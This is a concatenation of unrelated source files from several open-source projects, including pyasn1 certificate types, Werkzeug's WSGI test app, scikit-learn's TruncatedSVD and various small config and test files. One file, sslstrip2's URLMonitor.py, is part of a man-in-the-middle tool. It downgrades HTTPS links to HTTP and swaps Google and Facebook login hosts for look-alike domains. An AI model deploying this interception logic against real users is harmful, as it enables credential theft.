namedtype.NamedType('policyIdentifier', CertPolicyId()),
namedtype.OptionalNamedType('policyQualifiers', univ.SequenceOf(componentType=PolicyQualifierInfo()).subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX)))
)
class CertificatePolicies(univ.SequenceOf):
componentType = PolicyInformation()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_policyMappings = univ.ObjectIdentifier('2.5.29.33')
class PolicyMapping(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('issuerDomainPolicy', CertPolicyId()),
namedtype.NamedType('subjectDomainPolicy', CertPolicyId())
)
class PolicyMappings(univ.SequenceOf):
componentType = PolicyMapping()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_privateKeyUsagePeriod = univ.ObjectIdentifier('2.5.29.16')
class PrivateKeyUsagePeriod(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('notBefore', useful.GeneralizedTime().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('notAfter', useful.GeneralizedTime().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
id_ce_keyUsage = univ.ObjectIdentifier('2.5.29.15')
class KeyUsage(univ.BitString):
namedValues = namedval.NamedValues(
('digitalSignature', 0),
('nonRepudiation', 1),
('keyEncipherment', 2),
('dataEncipherment', 3),
('keyAgreement', 4),
('keyCertSign', 5),
('cRLSign', 6),
('encipherOnly', 7),
('decipherOnly', 8)
)
id_ce = univ.ObjectIdentifier('2.5.29')
id_ce_authorityKeyIdentifier = univ.ObjectIdentifier('2.5.29.35')
class KeyIdentifier(univ.OctetString): pass
id_ce_subjectKeyIdentifier = univ.ObjectIdentifier('2.5.29.14')
class SubjectKeyIdentifier(KeyIdentifier): pass
class AuthorityKeyIdentifier(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('keyIdentifier', KeyIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('authorityCertIssuer', GeneralNames().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('authorityCertSerialNumber', CertificateSerialNumber().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
)
id_ce_certificateIssuer = univ.ObjectIdentifier('2.5.29.29')
class CertificateIssuer(GeneralNames): pass
id_ce_subjectAltName = univ.ObjectIdentifier('2.5.29.17')
class SubjectAltName(GeneralNames): pass
id_ce_issuerAltName = univ.ObjectIdentifier('2.5.29.18')
class IssuerAltName(GeneralNames): pass
|
kehao95/Wechat_LearnHelper
|
refs/heads/master
|
src/env/lib/python3.5/site-packages/werkzeug/testapp.py
|
364
|
# -*- coding: utf-8 -*-
"""
werkzeug.testapp
~~~~~~~~~~~~~~~~
Provide a small test application that can be used to test a WSGI server
and check it for WSGI compliance.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import werkzeug
from textwrap import wrap
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.utils import escape
import base64
logo = Response(base64.b64decode('''
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
='''), mimetype='image/png')
TEMPLATE = u'''\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<title>WSGI Information</title>
<style type="text/css">
@import url(http://fonts.googleapis.com/css?family=Ubuntu);
body { font-family: 'Lucida Grande', 'Lucida Sans Unicode', 'Geneva',
'Verdana', sans-serif; background-color: white; color: #000;
font-size: 15px; text-align: center; }
#logo { float: right; padding: 0 0 10px 10px; }
div.box { text-align: left; width: 45em; margin: auto; padding: 50px 0;
background-color: white; }
h1, h2 { font-family: 'Ubuntu', 'Lucida Grande', 'Lucida Sans Unicode',
'Geneva', 'Verdana', sans-serif; font-weight: normal; }
h1 { margin: 0 0 30px 0; }
h2 { font-size: 1.4em; margin: 1em 0 0.5em 0; }
table { width: 100%%; border-collapse: collapse; border: 1px solid #AFC5C9 }
table th { background-color: #AFC1C4; color: white; font-size: 0.72em;
font-weight: normal; width: 18em; vertical-align: top;
padding: 0.5em 0 0.1em 0.5em; }
table td { border: 1px solid #AFC5C9; padding: 0.1em 0 0.1em 0.5em; }
code { font-family: 'Consolas', 'Monaco', 'Bitstream Vera Sans Mono',
monospace; font-size: 0.7em; }
ul li { line-height: 1.5em; }
ul.path { font-size: 0.7em; margin: 0 -30px; padding: 8px 30px;
list-style: none; background: #E8EFF0; }
ul.path li { line-height: 1.6em; }
li.virtual { color: #999; text-decoration: underline; }
li.exp { background: white; }
</style>
<div class="box">
<img src="?resource=logo" id="logo" alt="[The Werkzeug Logo]" />
<h1>WSGI Information</h1>
<p>
This page displays all available information about the WSGI server and
the underlying Python interpreter.
<h2 id="python-interpreter">Python Interpreter</h2>
<table>
<tr>
<th>Python Version
<td>%(python_version)s
<tr>
<th>Platform
<td>%(platform)s [%(os)s]
<tr>
<th>API Version
<td>%(api_version)s
<tr>
<th>Byteorder
<td>%(byteorder)s
<tr>
<th>Werkzeug Version
<td>%(werkzeug_version)s
</table>
<h2 id="wsgi-environment">WSGI Environment</h2>
<table>%(wsgi_env)s</table>
<h2 id="installed-eggs">Installed Eggs</h2>
<p>
The following python packages were installed on the system as
Python eggs:
<ul>%(python_eggs)s</ul>
<h2 id="sys-path">System Path</h2>
<p>
The following paths are the current contents of the load path. The
following entries are looked up for Python packages. Note that not
all items in this path are folders. Gray and underlined items are
entries pointing to invalid resources or used by custom import hooks
such as the zip importer.
<p>
Items with a bright background were expanded for display from a relative
path. If you encounter such paths in the output you might want to check
your setup as relative paths are usually problematic in multithreaded
environments.
<ul class="path">%(sys_path)s</ul>
</div>
'''
def iter_sys_path():
if os.name == 'posix':
def strip(x):
prefix = os.path.expanduser('~')
if x.startswith(prefix):
x = '~' + x[len(prefix):]
return x
else:
strip = lambda x: x
cwd = os.path.abspath(os.getcwd())
for item in sys.path:
path = os.path.join(cwd, item or os.path.curdir)
yield strip(os.path.normpath(path)), \
not os.path.isdir(path), path != item
def render_testapp(req):
try:
import pkg_resources
except ImportError:
eggs = ()
else:
eggs = sorted(pkg_resources.working_set,
key=lambda x: x.project_name.lower())
python_eggs = []
for egg in eggs:
try:
version = egg.version
except (ValueError, AttributeError):
version = 'unknown'
python_eggs.append('<li>%s <small>[%s]</small>' % (
escape(egg.project_name),
escape(version)
))
wsgi_env = []
sorted_environ = sorted(req.environ.items(),
key=lambda x: repr(x[0]).lower())
for key, value in sorted_environ:
wsgi_env.append('<tr><th>%s<td><code>%s</code>' % (
escape(str(key)),
' '.join(wrap(escape(repr(value))))
))
sys_path = []
for item, virtual, expanded in iter_sys_path():
class_ = []
if virtual:
class_.append('virtual')
if expanded:
class_.append('exp')
sys_path.append('<li%s>%s' % (
class_ and ' class="%s"' % ' '.join(class_) or '',
escape(item)
))
return (TEMPLATE % {
'python_version': '<br>'.join(escape(sys.version).splitlines()),
'platform': escape(sys.platform),
'os': escape(os.name),
'api_version': sys.api_version,
'byteorder': sys.byteorder,
'werkzeug_version': werkzeug.__version__,
'python_eggs': '\n'.join(python_eggs),
'wsgi_env': '\n'.join(wsgi_env),
'sys_path': '\n'.join(sys_path)
}).encode('utf-8')
def test_app(environ, start_response):
"""Simple test application that dumps the environment. You can use
it to check if Werkzeug is working properly:
.. sourcecode:: pycon
>>> from werkzeug.serving import run_simple
>>> from werkzeug.testapp import test_app
>>> run_simple('localhost', 3000, test_app)
* Running on http://localhost:3000/
The application displays important information from the WSGI environment,
the Python interpreter and the installed libraries.
"""
req = Request(environ, populate_request=False)
if req.args.get('resource') == 'logo':
response = logo
else:
response = Response(render_testapp(req), mimetype='text/html')
return response(environ, start_response)
if __name__ == '__main__':
from werkzeug.serving import run_simple
run_simple('localhost', 5000, test_app, use_reloader=True)
|
inscriptionweb/sslstrip2
|
refs/heads/master
|
sslstrip/URLMonitor.py
|
20
|
# URLMonitor
import re
import logging
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/wwww.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
self.sustitucion["mail.google.com"] = "gmail.google.com"
self.real["gmail.google.com"] = "mail.google.com"
self.sustitucion["www.facebook.com"] = "social.facebook.com"
self.real["social.facebook.com"] = "www.facebook.com"
self.sustitucion["accounts.google.com"] = "cuentas.google.com"
self.real["cuentas.google.com"] = "accounts.google.com"
self.sustitucion["accounts.google.es"] = "cuentas.google.es"
self.real["cuentas.google.es"] = "accounts.google.es"
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
logging.debug("JavaScript trickery!")
return True
if (client, url) in self.strippedURLs:
logging.debug("(%s, %s) in strippedURLs" % (client, url))
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
if pathIndex is -1:
pathIndex = len(url)
url += "/"
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)
|
jfpla/odoo
|
refs/heads/8.0
|
openerp/addons/test_exceptions/__openerp__.py
|
435
|
# -*- coding: utf-8 -*-
{
'name': 'test-exceptions',
'version': '0.1',
'category': 'Tests',
'description': """A module to generate exceptions.""",
'author': 'OpenERP SA',
'maintainer': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base'],
'data': ['view.xml', 'ir.model.access.csv'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
alex-march/micropython
|
refs/heads/master
|
tests/bench/var-7-instance-meth.py
|
102
|
import bench
class Foo:
def __init__(self):
self._num = 20000000
def num(self):
return self._num
def test(num):
o = Foo()
i = 0
while i < o.num():
i += 1
bench.run(test)
|
AloneRoad/Inforlearn
|
refs/heads/1.0-rc3
|
django/core/management/color.py
|
26
|
"""
Sets up the terminal color scheme.
"""
import sys
from django.utils import termcolors
def supports_color():
"""
Returns True if the running system's terminal supports color, and False
otherwise.
"""
unsupported_platform = (sys.platform in ('win32', 'Pocket PC'))
# isatty is not always implemented, #6223.
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if unsupported_platform or not is_a_tty:
return False
return True
def color_style():
"""Returns a Style object with the Django color scheme."""
if not supports_color():
return no_style()
class dummy: pass
style = dummy()
style.ERROR = termcolors.make_style(fg='red', opts=('bold',))
style.ERROR_OUTPUT = termcolors.make_style(fg='red', opts=('bold',))
style.NOTICE = termcolors.make_style(fg='red')
style.SQL_FIELD = termcolors.make_style(fg='green', opts=('bold',))
style.SQL_COLTYPE = termcolors.make_style(fg='green')
style.SQL_KEYWORD = termcolors.make_style(fg='yellow')
style.SQL_TABLE = termcolors.make_style(opts=('bold',))
return style
def no_style():
"""Returns a Style object that has no colors."""
class dummy:
def __getattr__(self, attr):
return lambda x: x
return dummy()
|
DataDog/integrations-extras
|
refs/heads/master
|
open_policy_agent/datadog_checks/__init__.py
|
42
|
__path__ = __import__('pkgutil').extend_path(__path__, __name__) # type: ignore
|
wtmmac/p2pool
|
refs/heads/master
|
p2pool/test/util/test_pack.py
|
283
|
import unittest
from p2pool.util import pack
class Test(unittest.TestCase):
def test_VarInt(self):
t = pack.VarIntType()
for i in xrange(2**20):
assert t.unpack(t.pack(i)) == i
for i in xrange(2**36, 2**36+25):
assert t.unpack(t.pack(i)) == i
|
vvv1559/intellij-community
|
refs/heads/master
|
python/testData/codeInsight/controlflow/assertfalseargument.py
|
83
|
assert False, 'foo'
print('unreachable 1')
assert False, f()
print('unreachable 2')
|
jtamiace/fle-home
|
refs/heads/master
|
fle_site/apps/redirects/migrations/0003_auto__add_field_redirectlogentry_url.py
|
4
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'RedirectLogEntry.url'
db.add_column(u'redirects_redirectlogentry', 'url',
self.gf('django.db.models.fields.URLField')(default='', max_length=200, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'RedirectLogEntry.url'
db.delete_column(u'redirects_redirectlogentry', 'url')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'redirects.redirectlogentry': {
'Meta': {'object_name': 'RedirectLogEntry'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'referer': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['redirects.RedirectRule']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'user_agent': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
u'redirects.redirectrule': {
'Meta': {'object_name': 'RedirectRule'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'override': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'redirects.redirectvariable': {
'Meta': {'object_name': 'RedirectVariable'},
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '150'})
}
}
complete_apps = ['redirects']
|
hdmetor/scikit-learn
|
refs/heads/master
|
sklearn/decomposition/truncated_svd.py
|
199
|
"""Truncated SVD for sparse matrices, aka latent semantic analysis (LSA).
"""
# Author: Lars Buitinck <[email protected]>
# Olivier Grisel <[email protected]>
# Michael Becker <[email protected]>
# License: 3-clause BSD.
import numpy as np
import scipy.sparse as sp
try:
from scipy.sparse.linalg import svds
except ImportError:
from ..utils.arpack import svds
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array, as_float_array, check_random_state
from ..utils.extmath import randomized_svd, safe_sparse_dot, svd_flip
from ..utils.sparsefuncs import mean_variance_axis
__all__ = ["TruncatedSVD"]
class TruncatedSVD(BaseEstimator, TransformerMixin):
"""Dimensionality reduction using truncated SVD (aka LSA).
This transformer performs linear dimensionality reduction by means of
truncated singular value decomposition (SVD). It is very similar to PCA,
but operates on sample vectors directly, instead of on a covariance matrix.
This means it can work with scipy.sparse matrices efficiently.
In particular, truncated SVD works on term count/tf-idf matrices as
returned by the vectorizers in sklearn.feature_extraction.text. In that
context, it is known as latent semantic analysis (LSA).
This estimator supports two algorithm: a fast randomized SVD solver, and
a "naive" algorithm that uses ARPACK as an eigensolver on (X * X.T) or
(X.T * X), whichever is more efficient.
Read more in the :ref:`User Guide <LSA>`.
Parameters
----------
n_components : int, default = 2
Desired dimensionality of output data.
Must be strictly less than the number of features.
The default value is useful for visualisation. For LSA, a value of
100 is recommended.
algorithm : string, default = "randomized"
SVD solver to use. Either "arpack" for the ARPACK wrapper in SciPy
(scipy.sparse.linalg.svds), or "randomized" for the randomized
algorithm due to Halko (2009).
n_iter : int, optional
Number of iterations for randomized SVD solver. Not used by ARPACK.
random_state : int or RandomState, optional
(Seed for) pseudo-random number generator. If not given, the
numpy.random singleton is used.
tol : float, optional
Tolerance for ARPACK. 0 means machine precision. Ignored by randomized
SVD solver.
Attributes
----------
components_ : array, shape (n_components, n_features)
explained_variance_ratio_ : array, [n_components]
Percentage of variance explained by each of the selected components.
explained_variance_ : array, [n_components]
The variance of the training samples transformed by a projection to
each component.
Examples
--------
>>> from sklearn.decomposition import TruncatedSVD
>>> from sklearn.random_projection import sparse_random_matrix
>>> X = sparse_random_matrix(100, 100, density=0.01, random_state=42)
>>> svd = TruncatedSVD(n_components=5, random_state=42)
>>> svd.fit(X) # doctest: +NORMALIZE_WHITESPACE
TruncatedSVD(algorithm='randomized', n_components=5, n_iter=5,
random_state=42, tol=0.0)
>>> print(svd.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.07825... 0.05528... 0.05445... 0.04997... 0.04134...]
>>> print(svd.explained_variance_ratio_.sum()) # doctest: +ELLIPSIS
0.27930...
See also
--------
PCA
RandomizedPCA
References
----------
Finding structure with randomness: Stochastic algorithms for constructing
approximate matrix decompositions
Halko, et al., 2009 (arXiv:909) http://arxiv.org/pdf/0909.4061
Notes
-----
SVD suffers from a problem called "sign indeterminancy", which means the
sign of the ``components_`` and the output from transform depend on the
algorithm and random state. To work around this, fit instances of this
class to data once, then keep the instance around to do transformations.
"""
def __init__(self, n_components=2, algorithm="randomized", n_iter=5,
random_state=None, tol=0.):
self.algorithm = algorithm
self.n_components = n_components
self.n_iter = n_iter
self.random_state = random_state
self.tol = tol
def fit(self, X, y=None):
"""Fit LSI model on training data X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
Returns
-------
self : object
Returns the transformer object.
"""
self.fit_transform(X)
return self
def fit_transform(self, X, y=None):
"""Fit LSI model to X and perform dimensionality reduction on X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
Returns
-------
X_new : array, shape (n_samples, n_components)
Reduced version of X. This will always be a dense array.
"""
X = as_float_array(X, copy=False)
random_state = check_random_state(self.random_state)
# If sparse and not csr or csc, convert to csr
if sp.issparse(X) and X.getformat() not in ["csr", "csc"]:
X = X.tocsr()
if self.algorithm == "arpack":
U, Sigma, VT = svds(X, k=self.n_components, tol=self.tol)
# svds doesn't abide by scipy.linalg.svd/randomized_svd
# conventions, so reverse its outputs.
Sigma = Sigma[::-1]
U, VT = svd_flip(U[:, ::-1], VT[::-1])
elif self.algorithm == "randomized":
k = self.n_components
n_features = X.shape[1]
if k >= n_features:
raise ValueError("n_components must be < n_features;"
" got %d >= %d" % (k, n_features))
U, Sigma, VT = randomized_svd(X, self.n_components,
n_iter=self.n_iter,
random_state=random_state)
else:
raise ValueError("unknown algorithm %r" % self.algorithm)
self.components_ = VT
# Calculate explained variance & explained variance ratio
X_transformed = np.dot(U, np.diag(Sigma))
self.explained_variance_ = exp_var = np.var(X_transformed, axis=0)
if sp.issparse(X):
_, full_var = mean_variance_axis(X, axis=0)
full_var = full_var.sum()
else:
full_var = np.var(X, axis=0).sum()
self.explained_variance_ratio_ = exp_var / full_var
return X_transformed
def transform(self, X):
"""Perform dimensionality reduction on X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
New data.
Returns
-------
X_new : array, shape (n_samples, n_components)
Reduced version of X. This will always be a dense array.
"""
X = check_array(X, accept_sparse='csr')
return safe_sparse_dot(X, self.components_.T)
def inverse_transform(self, X):
"""Transform X back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data.
Returns
-------
X_original : array, shape (n_samples, n_features)
Note that this is always a dense array.
"""
X = check_array(X)
return np.dot(X, self.components_)
|
zenoss/Community-Zenpacks
|
refs/heads/master
|
ZenPacks.chudler.GoogleAppEngine/ZenPacks/chudler/GoogleAppEngine/migrate/__init__.py
|
1165
|
# __init__.py
|
jordotech/sherri_satchmo
|
refs/heads/master
|
satchmo/apps/shipping/modules/tieredweight/config.py
|
12
|
import logging
from django.utils.translation import ugettext_lazy as _
from livesettings import *
log = logging.getLogger('tieredweight.config')
from shipping.config import SHIPPING_ACTIVE
SHIPPING_ACTIVE.add_choice(('shipping.modules.tieredweight', _('Tiered Weight Shipping')))
log.debug('loaded')
|
boundlessgeo/QGIS
|
refs/heads/master
|
tests/src/python/test_qgsfeature.py
|
7
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsFeature.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Germán Carrillo'
__date__ = '06/10/2012'
__copyright__ = 'Copyright 2012, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
import os
from qgis.core import (QgsFeature,
QgsPoint,
QgsGeometry,
QgsPointXY,
QgsVectorLayer,
NULL,
QgsFields,
QgsField)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
